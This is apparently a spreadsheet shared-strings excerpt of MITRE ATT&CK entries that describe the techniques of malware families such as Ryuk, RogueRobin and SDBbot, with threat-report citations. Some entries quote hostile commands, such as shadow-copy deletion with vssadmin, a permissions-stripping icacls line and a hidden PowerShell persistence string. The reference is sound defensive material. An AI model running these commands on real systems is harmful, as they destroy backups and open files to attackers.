  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) decrypted itself using a single-byte XOR scheme. Additionally, [Rising Sun](https://attack.mitre.org/software/S0448) can decrypt its configuration data at runtime.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can send data gathered from the infected machine via HTTP POST request to the C2.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can delete files specified by the C2.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. [Rising Sun](https://attack.mitre.org/software/S0448) can enumerate the compilation timestamp of Windows executable files.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can modify file attributes to hide files.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can clear process memory by overwriting it with junk bytes.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) used dynamic API resolutions to various Windows APIs by leveraging LoadLibrary() and GetProcAddress().(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>Configuration data used by [Rising Sun](https://attack.mitre.org/software/S0448) is encrypted using RC4.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can enumerate all running processes and process information on an infected machine.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can detect the computer name, operating system, and other native system information.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can detect network adapter and IP address information.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can detect the username of the infected host.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) has used HTTP for command and control.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) executed commands using cmd.exe.(Citation: McAfee Sharpshooter December 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) will search for an RSA encryption key and then perform its encryption process on the system files.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) will search for Windows services that are associated with antivirus software on the system and kill the process.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) deletes shadow copies to ensure that all the data cannot be restored easily.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) disconnects all network shares from the computer with the command &lt;code&gt;net use * /DELETE /Y&lt;/code&gt;.(Citation: CarbonBlack RobbinHood May 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) stops 181 Windows services on the system before beginning the encryption process.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) uses cmd.exe on the victim's computer.(Citation: CarbonBlack RobbinHood May 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) has used Google Drive as a Command and Control channel. (Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) decodes an embedded executable using base64 and decompresses it.(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) can save a new file to the system from the C2 server.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>The PowerShell script with the [RogueRobin](https://attack.mitre.org/software/S0270) payload was obfuscated using the COMPRESS technique in Invoke-Obfuscation.(Citation: Unit 42 DarkHydrus July 2018)(Citation: GitHub Invoke-Obfuscation)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses a command prompt to run a PowerShell script from Excel.(Citation: Unit 42 DarkHydrus July 2018) To assist in establishing persistence, [RogueRobin](https://attack.mitre.org/software/S0270) creates &lt;code&gt;%APPDATA%\OneDrive.bat&lt;/code&gt; and saves the following string to it:&lt;code&gt;powershell.exe -WindowStyle Hidden -exec bypass -File “%APPDATA%\OneDrive.ps1”&lt;/code&gt;.(Citation: Unit42 DarkHydrus Jan 2019)(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses regsvr32.exe to run a .sct file for execution.(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) has a command named &lt;code&gt;$screenshot&lt;/code&gt; that may be responsible for taking screenshots of the victim machine.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) enumerates running processes to search for Wireshark and Windows Sysinternals suite.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) base64 encodes strings that are sent to the C2 over its DNS tunnel.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses WMI to check BIOS version for VBOX, bochs, qemu, virtualbox, and vm to check for evidence that the script might be executing within an analysis environment. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) gathers the IP address and domain from the victim’s machine.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) collects the victim’s username and whether that user is an admin.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses Windows Script Components.(Citation: Unit42 DarkHydrus Jan 2019)(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses various WMI queries to check if the sample is running in a sandbox.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. [Rover](https://attack.mitre.org/software/S0090) also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) searches for files on local drives based on a predefined list of file extensions.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) searches for files on attached removable drives based on a predefined list of file extensions every five seconds.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) automatically searches for files on local drives based on a predefined list of file extensions.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) has keylogging functionality.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) copies files from removable drives to &lt;code&gt;C:\system&lt;/code&gt;.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) has functionality to remove Registry Run key persistence as a cleanup procedure.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) persists by creating a Registry entry in &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt;.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) takes screenshots of the compromised system's desktop and saves them to &lt;code&gt;C:\system\screenshot.bmp&lt;/code&gt; for exfiltration every 60 minutes.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) can be used to enumerate Exchange users and dump the GAL.(Citation: SensePost Ruler GitHub)</t>
  </si>
  <si>
    <t>Outlook Forms</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Forms to establish persistence.(Citation: SensePost Ruler GitHub)</t>
  </si>
  <si>
    <t>Outlook Home Page</t>
  </si>
  <si>
    <t xml:space="preserve">[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Home Pages to establish persistence.(Citation: SensePost Ruler GitHub) </t>
  </si>
  <si>
    <t>Outlook Rules</t>
  </si>
  <si>
    <t xml:space="preserve">[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Rules to establish persistence.(Citation: SensePost Ruler GitHub) </t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to compress files.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to clear event logs.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to open and copy data from the clipboard.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) kills antimalware running process.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to delete files from the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) captures keystrokes and sends them back to the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) adds itself to the Registry key &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; to establish persistence upon reboot.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) gathers the OS version, logical drives information, processor information, and volume information.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) uses a batch file to kill a security program task and then attempts to remove itself.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has attempted to adjust its token privileges to have the &lt;code&gt;SeDebugPrivilege&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has stopped services related to anti-virus.(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can use stolen domain admin accounts to move laterally within a victim domain.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;GetLogicalDrives&lt;/code&gt; to emumerate all mounted drives, and &lt;code&gt;GetDriveTypeW&lt;/code&gt; to determine the drive type.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used &lt;code&gt;vssadmin Delete Shadows /all /quiet&lt;/code&gt; to to delete volume shadow copies and &lt;code&gt;vssadmin resize shadowstorage&lt;/code&gt; to force deletion of shadow copies created by third-party applications.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can create .dll files that actually contain a Rich Text File format document.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has constructed legitimate appearing installation folder paths by calling &lt;code&gt;GetWindowsDirectoryW&lt;/code&gt; and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as &lt;code&gt;C:\Users\Public&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used multiple native APIs including &lt;code&gt;ShellExecuteW&lt;/code&gt; to run executables,&lt;code&gt;GetWindowsDirectoryW&lt;/code&gt; to create folders, and &lt;code&gt;VirtualAlloc&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, and &lt;code&gt;CreateRemoteThread&lt;/code&gt; for process injection.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;CreateToolhelp32Snapshot&lt;/code&gt; to enumerate all running processes.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has injected itself into remote processes to encrypt files using a combination of &lt;code&gt;VirtualAlloc&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used the Windows command line to create a Registry entry under &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; to establish persistence.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used the C$ network share for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can remotely create a scheduled task to execute itself on a system.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;kill.bat&lt;/code&gt; for stopping services, disabling services and killing processes.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;GetIpNetTable&lt;/code&gt; in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries.(Citation: CrowdStrike Ryuk January 2019)(Citation: Bleeping Computer - Ryuk WoL) </t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used Wake-on-Lan to power on turned off systems for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used &lt;code&gt;cmd.exe&lt;/code&gt; to create a Registry entry to establish persistence.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can launch &lt;code&gt;icacls &lt;path&gt; /grant Everyone:F /T /C /Q&lt;/code&gt; to delete every access-based restrictions on files and directories.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may create a temporary user on the system named “Lost_{Unique Identifier}” with the password “pond~!@6”{Unique Identifier}.”(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) runs the command &lt;code&gt;net user&lt;/code&gt; on a victim. [S-Type](https://attack.mitre.org/software/S0085) also runs tests to determine the privilege level of the compromised user.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may save itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ IMJPMIJ8.1{3 characters of Unique Identifier}&lt;/code&gt;.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may create the file &lt;code&gt;%HOMEPATH%\Start Menu\Programs\Startup\Realtek {Unique Identifier}.lnk&lt;/code&gt;, which points to the malicious msdtc.exe file already created in the %CommonFiles% directory.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) uses Base64 encoding for C2 traffic.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>The initial beacon packet for [S-Type](https://attack.mitre.org/software/S0085) contains the operating system version and file system of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) runs the command &lt;code&gt;net start&lt;/code&gt; on a victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) uses HTTP for C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use application shimming for persistence if it detects it is running as admin on Windows XP or 7, by creating a shim database to patch services.exe.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to access the file system on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to decrypt and decompress its payload to enable code execution.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to inject a downloaded DLL into a newly created rundll32.exe process.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to delete files from a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to get directory listings or drive information on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to clean up and remove data structures from a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to download a DLL from C2 to a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to communicate with C2 with TCP over port 443.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to XOR the strings for its installer component with a hardcoded 128 byte key.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use port forwarding to establish a proxy between a target host and C2.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to add a value to the Registry Run key to establish persistence if it detects it is running with regular user privilege. (Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use RDP to connect to victim's machines.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has used a packed installer file.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to identify the OS version, country code, and computer name.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to determine the domain name and whether a proxy is configured on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to identify the user on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to record video on a compromised host.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use the command shell to execute commands on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDelete](https://attack.mitre.org/software/S0195) deletes data in a way that makes it unrecoverable.(Citation: Microsoft SDelete July 2016)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can download remote files onto victims.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can timestomp files on victims using a Web shell.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can execute commands on victims.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to upload and download files.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has used base64 encoding and XOR to obfuscate PowerShell scripts.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to employ a custom PowerShell script.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the IP address, machine name, and OS of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the domain of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the current date and time on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHIPSHAPE](https://attack.mitre.org/software/S0028) achieves persistence by creating a shortcut in the Startup folder.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[APT30](https://attack.mitre.org/groups/G0013) may have used the [SHIPSHAPE](https://attack.mitre.org/software/S0028) malware to move onto air-gapped networks. [SHIPSHAPE](https://attack.mitre.org/software/S0028) targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to obtain a directory listing.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to retrieve information about connected users.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) is obscured using XOR encoding and appended to a valid GIF file.(Citation: FireEye Clandestine Wolf)(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to obtain a process listing.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) uses [netstat](https://attack.mitre.org/software/S0104) to list TCP connection status.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can download and execute an arbitary executable.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can capture screenshots.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can collect system information.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has hashed a string containing system information prior to exfiltration via POST requests.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has uploaded files and information from victim machines.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has sent system information to a C2 server via HTTP and HTTPS POST requests.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can enumerate files and directories.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has been created with a hidden attribute to insure it's not visible to the victim.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has downloaded files onto a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has a keylogging capability.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has named a service it establishes on victim machines as "TaskFrame" to hide its malicious purpose.(Citation: CISA MAR SLOTHFULMEDIA October 2020) </t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has mimicked the names of known executables, such as mediaplayer.exe.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can add, modify, and/or delete registry keys. It has changed the proxy configuration of a victim system by modifying the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap&lt;/code&gt; registry.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has enumerated processes by ID, name, or privileges.(Citation: CISA MAR SLOTHFULMEDIA October 2020) </t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can inject into running processes on a compromised host.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has taken a screenshot of a victim's desktop, named it "Filter3.jpg", and stored it in the local directory.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to start services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
